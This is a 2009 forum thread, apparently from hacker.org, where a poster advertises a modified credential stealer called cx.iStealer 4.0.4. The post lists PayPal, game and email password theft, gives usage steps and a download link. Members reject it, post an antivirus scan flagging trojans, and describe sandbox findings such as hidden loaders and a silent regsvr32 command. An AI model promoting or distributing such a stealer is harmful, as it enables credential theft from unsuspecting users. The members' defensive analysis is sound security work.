cx.iStealer 4.0.4

cx.Skull Candy · Post by **cx.Skull Candy** » Thu Aug 13, 2009 7:08 pm

Hey.

Im a member of cx. labs, and we are releasing, for the first time ever, a build of cx.iStealer. We are a non-profit organisation at the moment, because we dont noramlly release any of our work. You may have heard of cx.iStealer (Private) before, if not I will list the features we have added ontop of the existing features of iStealer:

New Features:

= New PayPal steal option

= New WoW password steal option

= New Runescape password steal option

= Improved e-mail stealing

= Fixed Icons sometimes not working

We do not take credits for iStealer, we just modify it.

I will show you how to use it in the guide below:

Step One:

= Launch cx.Launcher.exe from the cx.iStealer 4.0.4 folder.

Step Two:

= iStealer will launch. Fill in your ftp details like you noramlly would.

Step Three:

= Once you have filled in this front page go to 'Options'

Step Four:

= Tick what you want from the new features, and get going!

Please leave feedback about how you think we have done, etc. This is our first public release, but it may not be our last.

Download link:

http://elite-market.com/cx.iStealer%204.0.4.rar

Why Elite-Market for our download site? We dont want to draw to much attention.

Good-luck, cx.Team

cx.Skull Candy · Post by **cx.Skull Candy** » Thu Aug 13, 2009 9:24 pm

Just a note, not aimed at anyone, but who-ever voted, 'No - It lacks something' didnt even download the file.

Now please, cx. have not released software publicly yet, and by doing things like that - immature things - your are;

A: Mocking us

B: Taking a stick and prodding our thoughts as to whether we should release anymore versions.

Please, feel free to ask questions, but dont vote in the poll untill you have actaully taken a look at our new features etc.

Many thanks, cx.

plope0726 · Post by **plope0726** » Thu Aug 13, 2009 9:45 pm

cx.Skull Candy wrote:Just a note, not aimed at anyone, but who-ever voted, 'No - It lacks something' didnt even download the file.

Now please, cx. have not released software publicly yet, and by doing things like that - immature things - your are;

A: Mocking us

B: Taking a stick and prodding our thoughts as to whether we should release anymore versions.

Please, feel free to ask questions, but dont vote in the poll untill you have actaully taken a look at our new features etc.

Many thanks, cx.

Don't post here. This is not a forum to advertise your bullshit. No one cares about your crap.

cx.Skull Candy · Post by **cx.Skull Candy** » Thu Aug 13, 2009 10:32 pm

Excuse me?

Is this another, 'I haz moar post counts, therefor larger penis' post?

F.U.C.K.O.F.F

V4hn · Post by **V4hn** » Thu Aug 13, 2009 11:11 pm

ok, a few things:

1. you're posting to a 'hacker'-forum - this one is absolute whitehat area, as you would have noticed by browsing the site before writing _anything_

2. you posted a short article with a guide made for script kiddies - something no good hacker could appreciate.

3. you posted without any reliable reference some piece of binary code hosted on some webpage, do you really believe anyone - well i'm quite sure there are a lot, but nevertheless - would download and execute this software - whether this is a trojan or not - on his own machine? Since I don't have any Resources for starting a VM over here I can't test this software, I'm sorry.

4. this seems to be Windows only _and_ closed source, so as long as there is no source code available,
this is of no real interest. since at least for me useful tools mustn't be closed source.

C'mon, what exactly did you expect from this vote regarding those points?
Since there was no other negative statement like "I don't want to try", I took the only available...

v4hn

plope0726 · Post by **plope0726** » Thu Aug 13, 2009 11:51 pm

cx.Skull Candy wrote:Excuse me?

Is this another, 'I haz moar post counts, therefor larger penis' post?

F.U.C.K.O.F.F

Yes excuse you is right, You're garbage isn't welcome. Exit the forum and don't come back. Post count means absolutely nothing it's post content that matters and your content is garbage. Now why don't you do like the rest of the skids and go play in traffic.

plope0726 · Post by **plope0726** » Fri Aug 14, 2009 12:11 am

"Scan ""Shell extension scan"" was finished."
"Infections";"2";"0";"2"
"Folders selected for scanning:";"C:\Documents and Settings\...\Desktop\cx.iStealer 4.0.4;"
"Scan started:";"Thursday, August 13, 2009, 8:09:09 PM"
"Scan finished:";"Thursday, August 13, 2009, 8:09:13 PM (3 second(s))"
"Total object scanned:";"11"
"User who launched the scan:";"..."

"Infections"
"File";"Infection";"Result"
"C:\Documents and Settings\...\Desktop\cx.iStealer 4.0.4\cx.iStealer 4.0.4\cx.Launcher.exe";"Trojan horse Dropper.Agent.MGQ";"Infected"
"C:\Documents and Settings\...\Desktop\cx.iStealer 4.0.4\cx.iStealer 4.0.4\iStealer 4.0.4.exe";"Trojan horse Downloader.Generic8.AUOW";"Infected"[/b]

Zaffron · Post by **Zaffron** » Fri Aug 14, 2009 4:11 am

:O

Looks like cx.labs are tricky little fuckers.

sabretooth · Post by **sabretooth** » Fri Aug 14, 2009 7:33 am

Zaffron wrote::O

Looks like cx.labs are tricky little fuckers.

obviously not tricky enough

cx.Skull Candy · Post by **cx.Skull Candy** » Fri Aug 14, 2009 9:32 am

Woah, lets not go pointing fingers just yet.

You expect iStealer to come up clean in a virus scan?

sabretooth · Post by **sabretooth** » Fri Aug 14, 2009 2:16 pm

cx.Skull Candy wrote:Woah, lets not go pointing fingers just yet.

You expect iStealer to come up clean in a virus scan?

It doesnt matter either way. This is a challenge site, not a blackhat hangout.

I'm sure paypal staff would be quite interested in this program. Why don't you try telling them all about it?

jeetee · Post by **jeetee** » Fri Aug 14, 2009 2:59 pm

cx.Skull Candy wrote:You expect iStealer to come up clean in a virus scan?

Off course I do. If it only does what you stated (even if it actually can do that), it would not generate a positive (whether that be a false one or not).
Also, as stated here before, if you guys are non-profit and for the benefit of others.. open-source it, perhaps one could learn from it.

Though, since I do not have the need, interest nor motivation and time to launch my virtual machine on my seperate internet-free pc, I shall no longer discuss this topic and software with you.

plope0726 · Post by **plope0726** » Fri Aug 14, 2009 5:19 pm

jeetee wrote:
cx.Skull Candy wrote:You expect iStealer to come up clean in a virus scan?
Off course I do. If it only does what you stated (even if it actually can do that), it would not generate a positive (whether that be a false one or not).
Also, as stated here before, if you guys are non-profit and for the benefit of others.. open-source it, perhaps one could learn from it.

Though, since I do not have the need, interest nor motivation and time to launch my virtual machine on my seperate internet-free pc, I shall no longer discuss this topic and software with you.

It should come up clean, the only thing AV should call if any is that it's a hacking tool not a Trojan. I've already tested the program in Virtual Box, and it's NO GOOD. It does absolutely nothing but perhaps drop a back door into your computer. Here's some info:

Tested on Virtual Box with Windows XP SP2

Original File: cx.iStealer 4.0.4.rar (

It extracts to the directory cx.iStealer 4.0.4
Contents:

COMLDG64 (subdirectory)
-bassmod.dll (hidden)
-COMDLG32.OCX
-Loader.exe (hidden)
COMDLG32.OCX
bassmod.dll (hidden)
cx.Launcher.exe
iStealer 4.0.4.exe
Registerfile.bat

cx.Loader.exe and iStealer 4.0.4.exe produce the following error:

"Windows cannot access the specified device, path, or file. You may not have the appropriate permissions to access the item."

Looks like it's trying to change system information...

Register files.bat tries to register the new COMDLG32.OCX (common dialog) file using the following command:

regsvr32 /s COMDLG32.OCX

I'm not sure what reason a program like this would have for messing with the registry?

In the COMLDG64 directory, Loader.exe (which is hidden BTW) produces the following error:

"Error creating process."

The program does absolutely nothing but infect your computer and mess with system files it SHOULD NOT be messing with. So yes, we will point fingers all day .

@cx.Skull Candy: And as for my penis size. I'm sure it's much larger than yours.

MelancholikHacker · Post by **MelancholikHacker** » Tue Aug 18, 2009 9:47 am

Here is their site http://cxlabs.com/ it contains very enriching content ^.^ ...
This looks to me like a 15 year old's feeble attempt to screw our computers up...
Trying to trick a whole community based on security.... Smart ^.^

PaRaDoX · Post by **PaRaDoX** » Fri Oct 02, 2009 2:44 am

cx.Skull Candy wrote:Just a note, not aimed at anyone, but who-ever voted, 'No - It lacks something' didnt even download the file.

Now please, cx. have not released software publicly yet, and by doing things like that - immature things - your are;

A: Mocking us

B: Taking a stick and prodding our thoughts as to whether we should release anymore versions.

Please, feel free to ask questions, but dont vote in the poll untill you have actaully taken a look at our new features etc.

Many thanks, cx.

Well, does that not say something to you?

In case you're a little slow, I'll spell it out for you:

We are:

A: Mocking you. On purpose.

B: Taking a stick and prodding you because we DON'T want to see new versions released.

Was that easy enough to understand for you? Or do I have to dumb it down a bit more?

hacker.org

cx.iStealer 4.0.4

Did you like the new features?

cx.iStealer 4.0.4